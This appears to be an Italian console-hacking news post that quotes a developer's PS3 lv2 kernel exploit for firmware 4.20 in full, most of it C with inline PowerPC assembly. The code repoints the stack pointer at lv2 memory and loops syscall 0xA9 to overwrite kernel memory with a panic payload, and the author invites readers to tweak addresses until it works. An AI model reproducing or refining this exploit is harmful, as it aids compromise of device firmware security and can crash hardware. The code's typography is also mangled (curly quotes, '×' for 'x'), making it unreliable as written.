Il coder KDSBest rilascia un nuovo exploit per lv2 che sembrerebbe funzionare su 4.20,
al momento questo exploit serve solo a far crashare la console, ma è un ottimo inizio per la costruzione di un nuovo Custom Firmware su firmware superiori al 3.55

ince @naehrwert posted an lv2 exploit I will do so too . The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);

int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0×00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

if(counter < 0×1000000)
goto doItAgain;

stackpointer = bufferStackpointer;
return 0;
}

I didn’t managed to make it work on 4.21 so I just did on 4.20